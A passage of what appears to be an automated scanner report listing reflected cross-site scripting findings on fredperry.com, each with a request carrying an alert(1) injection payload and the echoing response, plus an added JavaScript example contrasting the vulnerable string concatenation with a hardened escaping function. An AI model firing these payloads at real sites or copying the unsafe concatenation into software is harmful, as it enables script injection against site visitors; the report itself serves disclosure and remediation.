Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9f6"-alert(1)-"ff55126c3f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/faq/?8c9f6"-alert(1)-"ff55126c3f8=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=l69or4lakblg95828idk00ijs0; expires=Tue, 09-Nov-2010 17:20:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42166

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Frequen
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/faq/?8c9f6"-alert(1)-"ff55126c3f8=1");
//]]>
...[SNIP]...

1.49. http://www.fredperry.com/customercare/information/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1d2"-alert(1)-"42fbc0107c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare7c1d2"-alert(1)-"42fbc0107c9/information/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kiqa43s52v9mfokqjcgequat17; expires=Tue, 09-Nov-2010 17:18:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare7c1d2"-alert(1)-"42fbc0107c9/information/");
//]]>
...[SNIP]...

1.50. http://www.fredperry.com/customercare/information/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 477f5"-alert(1)-"ef99901e51e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/information477f5"-alert(1)-"ef99901e51e/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r1u2itv5omnem2c1mrj2n6ief5; expires=Tue, 09-Nov-2010 17:18:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/information477f5"-alert(1)-"ef99901e51e/");
//]]>
...[SNIP]...

1.51. http://www.fredperry.com/customercare/information/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/information/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24020"-alert(1)-"c2e99d599f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/information/?24020"-alert(1)-"c2e99d599f1=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e2t4iqbtg99k0fjj3tlm51ga61; expires=Tue, 09-Nov-2010 17:17:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Customs
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/information/?24020"-alert(1)-"c2e99d599f1=1");
//]]>
...[SNIP]...

1.52. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba55f"-alert(1)-"94d3f8d094a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercareba55f"-alert(1)-"94d3f8d094a/ordertracking/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=31u97j9kf5mgjd7o8iqk5h5f92; expires=Tue, 09-Nov-2010 17:18:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercareba55f"-alert(1)-"94d3f8d094a/ordertracking/");
//]]>
...[SNIP]...

1.53. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e908c"-alert(1)-"ff1f4769767 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/ordertrackinge908c"-alert(1)-"ff1f4769767/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tqjjko9svnmmijvl6ki4ckt6l4; expires=Tue, 09-Nov-2010 17:18:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/ordertrackinge908c"-alert(1)-"ff1f4769767/");
//]]>
...[SNIP]...

1.54. http://www.fredperry.com/customercare/ordertracking/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab65d"-alert(1)-"b8038686cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/ordertracking/?ab65d"-alert(1)-"b8038686cc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3nvha52q3f1fd5147u49c3m3i1; expires=Tue, 09-Nov-2010 17:17:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Order T
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/ordertracking/?ab65d"-alert(1)-"b8038686cc=1");
//]]>
...[SNIP]...
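Every finding on this page has the same sink: the request path (REST URL parameter 1 or 2) or the name of a query parameter is copied verbatim into the double-quoted string passed to pageTracker._trackPageview() in the Google Analytics snippet, so a payload of the form marker"-alert(1)-"marker closes the literal and the middle part runs as a JavaScript expression. The 404 responses (1.53, 1.55, 1.56 and so on) reflect it exactly like the 200 responses, so the error template carries the sink as well and any fix must cover it too. The following JavaScript is an added example, not code from fredperry.com or from the scanner report: it reproduces the vulnerable concatenation, shows a hardened rendering, and includes the check a tester would run against a captured response. renderTrackerUnsafe, renderTrackerSafe, jsStringLiteral, runSnippet, trackPageviewArg and hasUnescapedQuote are illustrative names; the site's real template code is not on this page and its shape is assumed.

```javascript
// Added example (not code from fredperry.com or from the scanner report).
// Demonstrates the sink reported on this page: a request path / parameter name is
// concatenated into a double-quoted JavaScript string inside the Google Analytics
// snippet, and a payload of the form  marker"-alert(1)-"marker  breaks out of it.

// The exact payload Burp submitted in finding 1.54, and the request URI it produced.
const PAYLOAD = 'ab65d"-alert(1)-"b8038686cc';
const REQUEST_URI = '/customercare/ordertracking/?' + PAYLOAD + '=1';

// Vulnerable rendering (assumed shape of the site's template; the real code is not on
// this page): the raw request URI is pasted between two literal double quotes.
function renderTrackerUnsafe(requestUri) {
  return 'pageTracker._trackPageview("' + requestUri + '");';
}

// Hardened rendering. JSON.stringify() produces a valid JS string literal (it escapes
// " and \ and control characters); the extra replacements cover what is still
// dangerous inside an HTML <script> block: "</script>" would end the block before the
// JS parser ever saw it, and U+2028/U+2029 are line terminators in JS source.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderTrackerSafe(requestUri) {
  return 'pageTracker._trackPageview(' + jsStringLiteral(requestUri) + ');';
}

// Run a rendered snippet against a stub tracker and a stub alert() and record what
// happened, so the two renderings can be compared by behaviour rather than by eye.
function runSnippet(snippet) {
  const calls = { tracked: [], alerts: [] };
  const pageTracker = { _trackPageview: (path) => { calls.tracked.push(path); } };
  const alert = (msg) => { calls.alerts.push(msg); };
  new Function('pageTracker', 'alert', snippet)(pageTracker, alert);
  return calls;
}

// Tester's check on a captured response body: pull out the argument of
// _trackPageview() and look for a double quote that is not preceded by a backslash.
// An unescaped quote means user input has terminated the string literal.
function trackPageviewArg(responseBody) {
  const m = /_trackPageview\("(.*)"\);/.exec(responseBody);
  return m ? m[1] : null;
}

function hasUnescapedQuote(literalBody) {
  for (let i = 0; i < literalBody.length; i++) {
    if (literalBody[i] === '\\') { i++; continue; } // skip the escaped character
    if (literalBody[i] === '"') return true;
  }
  return false;
}

// Stand-alone demo with the page's own payload.
function demo() {
  const renderers = [['unsafe', renderTrackerUnsafe], ['safe', renderTrackerSafe]];
  for (const [label, render] of renderers) {
    const snippet = render(REQUEST_URI);
    const result = runSnippet(snippet);
    console.log(label + ':', snippet);
    console.log('  alert() fired:', result.alerts.length > 0,
                '| unescaped quote in literal:', hasUnescapedQuote(trackPageviewArg(snippet)));
  }
}

demo();
```

With the unsafe rendering the evaluated statement is "…?ab65d" - alert(1) - "b8038686cc=1", so alert() fires and the tracker receives NaN; with the hardened rendering the tracker receives the original URI unchanged and nothing else executes. The same trackPageviewArg/hasUnescapedQuote check can be pointed at the bodies captured in the Request/Response pairs on this page.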

1.55. http://www.fredperry.com/customercare/returns/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 949c8"-alert(1)-"04627fbb78f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare949c8"-alert(1)-"04627fbb78f/returns/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vhqebjmfv1o1birdugll8iu0h4; expires=Tue, 09-Nov-2010 17:19:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare949c8"-alert(1)-"04627fbb78f/returns/");
//]]>
...[SNIP]...

1.56. http://www.fredperry.com/customercare/returns/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91a56"-alert(1)-"c8df448cb36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/returns91a56"-alert(1)-"c8df448cb36/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uj4chm4hhumhmvvm1k7503vl73; expires=Tue, 09-Nov-2010 17:19:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/returns91a56"-alert(1)-"c8df448cb36/");
//]]>
...[SNIP]...

1.57. http://www.fredperry.com/customercare/returns/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff83"-alert(1)-"be4f89bb799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/returns/?4ff83"-alert(1)-"be4f89bb799=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pivkvr5qittpcl1jhb08msmhs2; expires=Tue, 09-Nov-2010 17:18:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Returns
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/returns/?4ff83"-alert(1)-"be4f89bb799=1");
//]]>
...[SNIP]...

1.58. http://www.fredperry.com/footwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cffc"-alert(1)-"62f4b0a691c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear8cffc"-alert(1)-"62f4b0a691c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=er03stn5g3auh22ne9eev5a085; expires=Tue, 09-Nov-2010 17:03:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear8cffc"-alert(1)-"62f4b0a691c/");
//]]>
...[SNIP]...

1.59. http://www.fredperry.com/footwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbdc"-alert(1)-"ce09f5b9080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/?bfbdc"-alert(1)-"ce09f5b9080=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1fvvphdfq79bvvkmf81jq6p373; expires=Tue, 09-Nov-2010 17:01:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> footwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/?bfbdc"-alert(1)-"ce09f5b9080=1");
//]]>
...[SNIP]...

1.60. http://www.fredperry.com/footwear/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18143"-alert(1)-"e6c8aea808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

